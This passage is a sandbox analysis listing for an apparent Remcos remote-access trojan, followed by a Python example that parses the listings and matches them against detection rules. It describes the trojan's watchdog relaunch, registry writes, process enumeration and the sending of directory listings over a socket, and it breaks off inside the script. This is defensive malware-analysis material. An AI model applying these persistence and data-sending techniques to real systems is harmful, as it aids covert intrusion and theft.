                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                  • wcscmp.MSVCRT ref: 00404924
                                  • wcscmp.MSVCRT ref: 0040493C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                    • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,770A9F40), ref: 00404C1F
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(77052590,?,770A9F40), ref: 00404C2F
                                    • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C39
                                    • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,770A9F40), ref: 00404C43
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                    • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                    • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                    • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                    • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                    • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                    • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                  • atoi.MSVCRT ref: 00404B88
                                    • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                    • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                    • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                  • atoi.MSVCRT ref: 00404BE5
                                  • FindClose.KERNEL32(?), ref: 00404BF6
                                  • ExitThread.KERNEL32 ref: 00404BFE
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 338953085-0
                                  • Opcode ID: 106cf15084c160651ef456c2075b657c8e54840d3cf84fdb2eeb9ed7812cd245
                                  • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                  • Opcode Fuzzy Hash: 106cf15084c160651ef456c2075b657c8e54840d3cf84fdb2eeb9ed7812cd245
                                  • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                    • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                    • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                    • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                  • OpenMutexA.KERNEL32 ref: 0040A63B
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                    • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                    • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                    • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                  • _wgetenv.MSVCRT ref: 0040A7B3
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                  • _wgetenv.MSVCRT ref: 0040A758
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                  • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                  • CloseHandle.KERNEL32 ref: 0040A8AA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                  • API String ID: 2208868093-2207663338
                                  • Opcode ID: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                  • Opcode Fuzzy Hash: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                  • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
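The per-function "APIs" listings above are machine-readable: each bullet names an import, its module, the argument values the IDA plugin recovered, and the call site. The following Python is an added example, not part of the Joe Sandbox report and not Remcos code: it parses that bullet format and scores a listing against three behavioural patterns visible in this report (the watchdog relaunch function with OpenMutexA / OpenProcess(PROCESS_ALL_ACCESS) / WaitForSingleObject and the `\svchost.exe` strings, the Toolhelp32 process enumeration, and the directory enumeration that is sent over a socket). The sample listings embedded in it are abridged copies of lines from this page; the rule names, the API sets each rule requires and the `classify` scoring are my own choices, and the two numeric constants are the standard Win32 values printed by the plugin.

```python
import re

# One "APIs" bullet as the Joe Sandbox IDA plugin prints it, e.g.
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
#   • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
# Headers such as "APIs" or "Strings" and blank lines simply do not match.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")

# Standard Win32 values, written the way the plugin prints argument words.
PROCESS_ALL_ACCESS = "001F0FFF"   # OpenProcess dwDesiredAccess
TH32CS_SNAPPROCESS = "00000002"   # CreateToolhelp32Snapshot dwFlags


def parse_listing(text):
    """Turn a pasted "APIs" listing into a list of call records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append({"name": m["name"], "module": m["module"], "args": args,
                      "ref": m["ref"], "subcall": m["sub"]})
    return calls


def win32_apis(calls):
    """Import names other than the MSVCP60 std::string plumbing."""
    return {c["name"] for c in calls if c["module"] != "MSVCP60"}


def string_args(calls):
    """Literal arguments the plugin recovered (not '?' and not an 8-digit hex word)."""
    return {a for c in calls for a in c["args"] if a and a != "?" and not HEX8.fullmatch(a)}


def _first_arg_is(calls, api, value):
    return any(c["name"] == api and c["args"][:1] == [value] for c in calls)


# (rule name, required Win32 APIs, at least one of these strings if non-empty, extra check)
# The names and required sets are this example's own choices, not Joe Sandbox signatures.
RULES = [
    ("watchdog_relaunch",
     {"GetCurrentProcessId", "OpenMutexA", "OpenProcess", "WaitForSingleObject", "Sleep"},
     {"\\svchost.exe", "Remcos restarted by watchdog!"},
     lambda calls: _first_arg_is(calls, "OpenProcess", PROCESS_ALL_ACCESS)),
    ("process_enumeration",
     {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
     set(),
     lambda calls: _first_arg_is(calls, "CreateToolhelp32Snapshot", TH32CS_SNAPPROCESS)),
    ("directory_listing_over_socket",
     {"socket", "connect", "FindFirstFileW", "FindNextFileW", "FindClose", "send"},
     set(),
     lambda calls: True),
]


def classify(calls):
    """Map each rule name to True/False for one function's listing."""
    apis, strings = win32_apis(calls), string_args(calls)
    return {name: bool(need_apis <= apis
                       and (not need_strings or need_strings & strings)
                       and extra(calls))
            for name, need_apis, need_strings, extra in RULES}


# Constructed sample input: abridged copies of listings from this report.
WATCHDOG = r"""
• GetCurrentProcessId.KERNEL32 ref: 0040A5FE
• Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
• OpenMutexA.KERNEL32 ref: 0040A63B
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
• Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
• ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
• Sleep.KERNEL32(000007D0), ref: 0040A85E
"""
PROC_ENUM = r"""
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409A81
• Process32FirstW.KERNEL32(?,?), ref: 00409A9D
• Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
• CloseHandle.KERNEL32(?), ref: 00409BC1
"""
DIR_LISTING = r"""
• socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
• connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
• Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
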